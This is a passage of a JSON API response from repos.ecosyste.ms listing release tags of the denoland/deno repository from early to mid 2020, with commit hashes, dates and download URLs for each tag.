url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/h